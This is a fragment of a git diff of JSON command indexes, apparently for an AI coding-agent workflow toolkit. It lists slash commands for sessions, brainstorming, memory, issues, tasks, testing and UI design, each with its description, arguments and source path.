"description": "Mark active workflow session as complete, archive with lessons learned, update manifest, remove active flag",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/complete.md"
|
||||
},
|
||||
{
|
||||
"name": "list",
|
||||
"command": "/workflow:session:list",
|
||||
"description": "List all workflow sessions with status filtering, shows session metadata and progress information",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Beginner",
|
||||
"source": "../../../commands/workflow/session/list.md"
|
||||
},
|
||||
{
|
||||
"name": "resume",
|
||||
"command": "/workflow:session:resume",
|
||||
"description": "Resume the most recently paused workflow session with automatic session discovery and status update",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "session-management",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/resume.md"
|
||||
},
|
||||
{
|
||||
"name": "solidify",
|
||||
"command": "/workflow:session:solidify",
|
||||
"description": "Crystallize session learnings and user-defined constraints into permanent project guidelines",
|
||||
"arguments": "[--type <convention|constraint|learning>] [--category <category>] \\\"rule or insight\\",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/solidify.md"
|
||||
},
|
||||
{
|
||||
"name": "start",
|
||||
"command": "/workflow:session:start",
|
||||
"description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection",
|
||||
"arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/start.md"
|
||||
}
|
||||
],
|
||||
"tools": [
|
||||
{
|
||||
"name": "conflict-resolution",
|
||||
"command": "/workflow:tools:conflict-resolution",
|
||||
"description": "Detect and resolve conflicts between plan and existing codebase using CLI-powered analysis with Gemini/Qwen",
|
||||
"arguments": "--session WFS-session-id --context path/to/context-package.json",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/conflict-resolution.md"
|
||||
},
|
||||
{
|
||||
"name": "gather",
|
||||
"command": "/workflow:tools:gather",
|
||||
"description": "Intelligently collect project context using context-search-agent based on task description, packages into standardized JSON",
|
||||
"arguments": "--session WFS-session-id \\\"task description\\",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/context-gather.md"
|
||||
},
|
||||
{
|
||||
"name": "task-generate-agent",
|
||||
"command": "/workflow:tools:task-generate-agent",
|
||||
"description": "Generate implementation plan documents (IMPL_PLAN.md, task JSONs, TODO_LIST.md) using action-planning-agent - produces planning artifacts, does NOT execute code implementation",
|
||||
"arguments": "--session WFS-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/task-generate-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "task-generate-tdd",
|
||||
"command": "/workflow:tools:task-generate-tdd",
|
||||
"description": "Autonomous TDD task generation using action-planning-agent with Red-Green-Refactor cycles, test-first structure, and cycle validation",
|
||||
"arguments": "--session WFS-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/task-generate-tdd.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-coverage-analysis",
|
||||
"command": "/workflow:tools:tdd-coverage-analysis",
|
||||
"description": "Analyze test coverage and TDD cycle execution with Red-Green-Refactor compliance verification",
|
||||
"arguments": "--session WFS-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/tdd-coverage-analysis.md"
|
||||
},
|
||||
{
|
||||
"name": "test-concept-enhanced",
|
||||
"command": "/workflow:tools:test-concept-enhanced",
|
||||
"description": "Coordinate test analysis workflow using cli-execution-agent to generate test strategy via Gemini",
|
||||
"arguments": "--session WFS-test-session-id --context path/to/test-context-package.json",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/test-concept-enhanced.md"
|
||||
},
|
||||
{
|
||||
"name": "test-context-gather",
|
||||
"command": "/workflow:tools:test-context-gather",
|
||||
"description": "Collect test coverage context using test-context-search-agent and package into standardized test-context JSON",
|
||||
"arguments": "--session WFS-test-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "testing",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/test-context-gather.md"
|
||||
},
|
||||
{
|
||||
"name": "test-task-generate",
|
||||
"command": "/workflow:tools:test-task-generate",
|
||||
"description": "Generate test planning documents (IMPL_PLAN.md, test task JSONs, TODO_LIST.md) using action-planning-agent - produces test planning artifacts, does NOT execute tests",
|
||||
"arguments": "--session WFS-test-session-id",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/test-task-generate.md"
|
||||
}
|
||||
],
|
||||
"ui-design": [
|
||||
{
|
||||
"name": "animation-extract",
|
||||
"command": "/workflow:ui-design:animation-extract",
|
||||
"description": "Extract animation and transition patterns from prompt inference and image references for design system documentation",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--focus \"<types>\"] [--interactive] [--refine]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/animation-extract.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow:ui-design:codify-style",
|
||||
"command": "/workflow:ui-design:codify-style",
|
||||
"description": "Orchestrator to extract styles from code and generate shareable reference package with preview (automatic file discovery)",
|
||||
"arguments": "<path> [--package-name <name>] [--output-dir <path>] [--overwrite]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/codify-style.md"
|
||||
},
|
||||
{
|
||||
"name": "design-sync",
|
||||
"command": "/workflow:ui-design:design-sync",
|
||||
"description": "Synchronize finalized design system references to brainstorming artifacts, preparing them for /workflow:plan consumption",
|
||||
"arguments": "--session <session_id> [--selected-prototypes \"<list>\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/design-sync.md"
|
||||
},
|
||||
{
|
||||
"name": "explore-auto",
|
||||
"command": "/workflow:ui-design:explore-auto",
|
||||
"description": "Interactive exploratory UI design workflow with style-centric batch generation, creates design variants from prompts/images with parallel execution and user selection",
|
||||
"arguments": "[--input \"<value>\"] [--targets \"<list>\"] [--target-type \"page|component\"] [--session <id>] [--style-variants <count>] [--layout-variants <count>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/explore-auto.md"
|
||||
},
|
||||
{
|
||||
"name": "generate",
|
||||
"command": "/workflow:ui-design:generate",
|
||||
"description": "Assemble UI prototypes by combining layout templates with design tokens (default animation support), pure assembler without new content generation",
|
||||
"arguments": "[--design-id <id>] [--session <id>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/generate.md"
|
||||
},
|
||||
{
|
||||
"name": "imitate-auto",
|
||||
"command": "/workflow:ui-design:imitate-auto",
|
||||
"description": "UI design workflow with direct code/image input for design token extraction and prototype generation",
|
||||
"arguments": "[--input \"<value>\"] [--session <id>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/imitate-auto.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow:ui-design:import-from-code",
|
||||
"command": "/workflow:ui-design:import-from-code",
|
||||
"description": "Import design system from code files (CSS/JS/HTML/SCSS) with automatic file discovery and parallel agent analysis",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--source <path>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/import-from-code.md"
|
||||
},
|
||||
{
|
||||
"name": "layout-extract",
|
||||
"command": "/workflow:ui-design:layout-extract",
|
||||
"description": "Extract structural layout information from reference images or text prompts using Claude analysis with variant generation or refinement mode",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--targets \"<list>\"] [--variants <count>] [--device-type <desktop|mobile|tablet|responsive>] [--interactive] [--refine]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/layout-extract.md"
|
||||
},
|
||||
{
|
||||
"name": "workflow:ui-design:reference-page-generator",
|
||||
"command": "/workflow:ui-design:reference-page-generator",
|
||||
"description": "Generate multi-component reference pages and documentation from design run extraction",
|
||||
"arguments": "[--design-run <path>] [--package-name <name>] [--output-dir <path>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/reference-page-generator.md"
|
||||
},
|
||||
{
|
||||
"name": "style-extract",
|
||||
"command": "/workflow:ui-design:style-extract",
|
||||
"description": "Extract design style from reference images or text prompts using Claude analysis with variant generation or refinement mode",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--variants <count>] [--interactive] [--refine]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/style-extract.md"
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
@@ -1,896 +0,0 @@
|
||||
{
|
||||
"general": [
|
||||
{
|
||||
"name": "cli-init",
|
||||
"command": "/cli:cli-init",
|
||||
"description": "Generate .gemini/ and .qwen/ config directories with settings.json and ignore files based on workspace technology detection",
|
||||
"arguments": "[--tool gemini|qwen|all] [--output path] [--preview]",
|
||||
"category": "cli",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/cli/cli-init.md"
|
||||
},
|
||||
{
|
||||
"name": "enhance-prompt",
|
||||
"command": "/enhance-prompt",
|
||||
"description": "Enhanced prompt transformation using session memory and intent analysis with --enhance flag detection",
|
||||
"arguments": "user input to enhance",
|
||||
"category": "general",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/enhance-prompt.md"
|
||||
},
|
||||
{
|
||||
"name": "issue:discover",
|
||||
"command": "/issue:discover",
|
||||
"description": "Discover potential issues from multiple perspectives (bug, UX, test, quality, security, performance, maintainability, best-practices) using CLI explore. Supports Exa external research for security and best-practices perspectives.",
|
||||
"arguments": "<path-pattern> [--perspectives=bug,ux,...] [--external]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/discover.md"
|
||||
},
|
||||
{
|
||||
"name": "new",
|
||||
"command": "/issue:new",
|
||||
"description": "Create structured issue from GitHub URL or text description",
|
||||
"arguments": "<github-url | text-description> [--priority 1-5]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/new.md"
|
||||
},
|
||||
{
|
||||
"name": "queue",
|
||||
"command": "/issue:queue",
|
||||
"description": "Form execution queue from bound solutions using issue-queue-agent (solution-level)",
|
||||
"arguments": "[--rebuild] [--issue <id>]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/queue.md"
|
||||
},
|
||||
{
|
||||
"name": "compact",
|
||||
"command": "/memory:compact",
|
||||
"description": "Compact current session memory into structured text for session recovery, extracting objective/plan/files/decisions/constraints/state, and save via MCP core_memory tool",
|
||||
"arguments": "[optional: session description]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/compact.md"
|
||||
},
|
||||
{
|
||||
"name": "load",
|
||||
"command": "/memory:load",
|
||||
"description": "Delegate to universal-executor agent to analyze project via Gemini/Qwen CLI and return JSON core content package for task context",
|
||||
"arguments": "[--tool gemini|qwen] \\\"task context description\\",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/load.md"
|
||||
},
|
||||
{
|
||||
"name": "tech-research-rules",
|
||||
"command": "/memory:tech-research-rules",
|
||||
"description": "3-phase orchestrator: extract tech stack → Exa research → generate path-conditional rules (auto-loaded by Claude Code)",
|
||||
"arguments": "[session-id | tech-stack-name] [--regenerate] [--tool <gemini|qwen>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/tech-research-rules.md"
|
||||
},
|
||||
{
|
||||
"name": "update-full",
|
||||
"command": "/memory:update-full",
|
||||
"description": "Update all CLAUDE.md files using layer-based execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
|
||||
"arguments": "[--tool gemini|qwen|codex] [--path <directory>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/update-full.md"
|
||||
},
|
||||
{
|
||||
"name": "update-related",
|
||||
"command": "/memory:update-related",
|
||||
"description": "Update CLAUDE.md for git-changed modules using batched agent execution (4 modules/agent) with gemini→qwen→codex fallback, <15 modules uses direct execution",
|
||||
"arguments": "[--tool gemini|qwen|codex]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/update-related.md"
|
||||
},
|
||||
{
|
||||
"name": "version",
|
||||
"command": "/version",
|
||||
"description": "Display Claude Code version information and check for updates",
|
||||
"arguments": "",
|
||||
"category": "general",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Beginner",
|
||||
"source": "../../../commands/version.md"
|
||||
},
|
||||
{
|
||||
"name": "artifacts",
|
||||
"command": "/workflow:brainstorm:artifacts",
|
||||
"description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis",
|
||||
"arguments": "topic or challenge description [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/artifacts.md"
|
||||
},
|
||||
{
|
||||
"name": "auto-parallel",
|
||||
"command": "/workflow:brainstorm:auto-parallel",
|
||||
"description": "Parallel brainstorming automation with dynamic role selection and concurrent execution across multiple perspectives",
|
||||
"arguments": "topic or challenge description\" [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/brainstorm/auto-parallel.md"
|
||||
},
|
||||
{
|
||||
"name": "data-architect",
|
||||
"command": "/workflow:brainstorm:data-architect",
|
||||
"description": "Generate or update data-architect/analysis.md addressing guidance-specification discussion points for data architecture perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/data-architect.md"
|
||||
},
|
||||
{
|
||||
"name": "product-manager",
|
||||
"command": "/workflow:brainstorm:product-manager",
|
||||
"description": "Generate or update product-manager/analysis.md addressing guidance-specification discussion points for product management perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/product-manager.md"
|
||||
},
|
||||
{
|
||||
"name": "product-owner",
|
||||
"command": "/workflow:brainstorm:product-owner",
|
||||
"description": "Generate or update product-owner/analysis.md addressing guidance-specification discussion points for product ownership perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/product-owner.md"
|
||||
},
|
||||
{
|
||||
"name": "scrum-master",
|
||||
"command": "/workflow:brainstorm:scrum-master",
|
||||
"description": "Generate or update scrum-master/analysis.md addressing guidance-specification discussion points for Agile process perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/scrum-master.md"
|
||||
},
|
||||
{
|
||||
"name": "subject-matter-expert",
|
||||
"command": "/workflow:brainstorm:subject-matter-expert",
|
||||
"description": "Generate or update subject-matter-expert/analysis.md addressing guidance-specification discussion points for domain expertise perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/subject-matter-expert.md"
|
||||
},
|
||||
{
|
||||
"name": "synthesis",
|
||||
"command": "/workflow:brainstorm:synthesis",
|
||||
"description": "Clarify and refine role analyses through intelligent Q&A and targeted updates with synthesis agent",
|
||||
"arguments": "[optional: --session session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/brainstorm/synthesis.md"
|
||||
},
|
||||
{
|
||||
"name": "system-architect",
|
||||
"command": "/workflow:brainstorm:system-architect",
|
||||
"description": "Generate or update system-architect/analysis.md addressing guidance-specification discussion points for system architecture perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/system-architect.md"
|
||||
},
|
||||
{
|
||||
"name": "ux-expert",
|
||||
"command": "/workflow:brainstorm:ux-expert",
|
||||
"description": "Generate or update ux-expert/analysis.md addressing guidance-specification discussion points for UX perspective",
|
||||
"arguments": "optional topic - uses existing framework if available",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/brainstorm/ux-expert.md"
|
||||
},
|
||||
{
|
||||
"name": "clean",
|
||||
"command": "/workflow:clean",
|
||||
"description": "Intelligent code cleanup with mainline detection, stale artifact discovery, and safe execution",
|
||||
"arguments": "[--dry-run] [\\\"focus area\\\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/clean.md"
|
||||
},
|
||||
{
|
||||
"name": "debug",
|
||||
"command": "/workflow:debug",
|
||||
"description": "Interactive hypothesis-driven debugging with NDJSON logging, iterative until resolved",
|
||||
"arguments": "\\\"bug description or error message\\",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/debug.md"
|
||||
},
|
||||
{
|
||||
"name": "init",
|
||||
"command": "/workflow:init",
|
||||
"description": "Initialize project-level state with intelligent project analysis using cli-explore-agent",
|
||||
"arguments": "[--regenerate]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/init.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-fix",
|
||||
"command": "/workflow:lite-fix",
|
||||
"description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents",
|
||||
"arguments": "[--hotfix] \\\"bug description or issue reference\\",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "list",
|
||||
"command": "/workflow:session:list",
|
||||
"description": "List all workflow sessions with status filtering, shows session metadata and progress information",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Beginner",
|
||||
"source": "../../../commands/workflow/session/list.md"
|
||||
},
|
||||
{
|
||||
"name": "solidify",
|
||||
"command": "/workflow:session:solidify",
|
||||
"description": "Crystallize session learnings and user-defined constraints into permanent project guidelines",
|
||||
"arguments": "[--type <convention|constraint|learning>] [--category <category>] \\\"rule or insight\\",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/solidify.md"
|
||||
},
|
||||
{
|
||||
"name": "start",
|
||||
"command": "/workflow:session:start",
|
||||
"description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection",
|
||||
"arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/start.md"
|
||||
},
|
||||
{
|
||||
"name": "conflict-resolution",
|
||||
"command": "/workflow:tools:conflict-resolution",
|
||||
"description": "Detect and resolve conflicts between plan and existing codebase using CLI-powered analysis with Gemini/Qwen",
|
||||
"arguments": "--session WFS-session-id --context path/to/context-package.json",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/tools/conflict-resolution.md"
|
||||
},
|
||||
{
|
||||
"name": "gather",
|
||||
"command": "/workflow:tools:gather",
|
||||
"description": "Intelligently collect project context using context-search-agent based on task description, packages into standardized JSON",
|
||||
"arguments": "--session WFS-session-id \\\"task description\\",
|
||||
"category": "workflow",
|
||||
"subcategory": "tools",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/tools/context-gather.md"
|
||||
},
|
||||
{
|
||||
"name": "animation-extract",
|
||||
"command": "/workflow:ui-design:animation-extract",
|
||||
"description": "Extract animation and transition patterns from prompt inference and image references for design system documentation",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--focus \"<types>\"] [--interactive] [--refine]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/animation-extract.md"
|
||||
},
|
||||
{
|
||||
"name": "explore-auto",
|
||||
"command": "/workflow:ui-design:explore-auto",
|
||||
"description": "Interactive exploratory UI design workflow with style-centric batch generation, creates design variants from prompts/images with parallel execution and user selection",
|
||||
"arguments": "[--input \"<value>\"] [--targets \"<list>\"] [--target-type \"page|component\"] [--session <id>] [--style-variants <count>] [--layout-variants <count>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/explore-auto.md"
|
||||
},
|
||||
{
|
||||
"name": "imitate-auto",
|
||||
"command": "/workflow:ui-design:imitate-auto",
|
||||
"description": "UI design workflow with direct code/image input for design token extraction and prototype generation",
|
||||
"arguments": "[--input \"<value>\"] [--session <id>]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/imitate-auto.md"
|
||||
},
|
||||
{
|
||||
"name": "layout-extract",
|
||||
"command": "/workflow:ui-design:layout-extract",
|
||||
"description": "Extract structural layout information from reference images or text prompts using Claude analysis with variant generation or refinement mode",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--targets \"<list>\"] [--variants <count>] [--device-type <desktop|mobile|tablet|responsive>] [--interactive] [--refine]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/layout-extract.md"
|
||||
},
|
||||
{
|
||||
"name": "style-extract",
|
||||
"command": "/workflow:ui-design:style-extract",
|
||||
"description": "Extract design style from reference images or text prompts using Claude analysis with variant generation or refinement mode",
|
||||
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--variants <count>] [--interactive] [--refine]",
|
||||
"category": "workflow",
|
||||
"subcategory": "ui-design",
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/ui-design/style-extract.md"
|
||||
}
|
||||
],
|
||||
"implementation": [
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/issue:execute",
|
||||
"description": "Execute queue with codex using DAG-based parallel orchestration (solution-level)",
|
||||
"arguments": "[--worktree] [--queue <queue-id>]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "create",
|
||||
"command": "/task:create",
|
||||
"description": "Generate task JSON from natural language description with automatic file pattern detection, scope inference, and dependency analysis",
|
||||
"arguments": "\\\"task title\\",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/create.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/task:execute",
|
||||
"description": "Execute task JSON using appropriate agent (@doc-generator/@implementation-agent/@test-agent) with pre-analysis context loading and status tracking",
|
||||
"arguments": "task-id",
|
||||
"category": "task",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/workflow:execute",
|
||||
"description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking",
|
||||
"arguments": "[--resume-session=\\\"session-id\\\"]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-execute",
|
||||
"command": "/workflow:lite-execute",
|
||||
"description": "Execute tasks based on in-memory plan, prompt description, or file content",
|
||||
"arguments": "[--in-memory] [\\\"task description\\\"|file-path]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/lite-execute.md"
|
||||
},
|
||||
{
|
||||
"name": "test-cycle-execute",
|
||||
"command": "/workflow:test-cycle-execute",
|
||||
"description": "Execute test-fix workflow with dynamic task generation and iterative fix cycles until test pass rate >= 95% or max iterations reached. Uses @cli-planning-agent for failure analysis and task generation.",
|
||||
"arguments": "[--resume-session=\\\"session-id\\\"] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-cycle-execute.md"
|
||||
},
|
||||
{
|
||||
"name": "task-generate-agent",
|
||||
"command": "/workflow:tools:task-generate-agent",
|
||||
"description": "Generate implementation plan documents (IMPL_PLAN.md, task JSONs, TODO_LIST.md) using action-planning-agent - produces planning artifacts, does NOT execute code implementation",
|
||||
"arguments": "--session WFS-session-id",
|
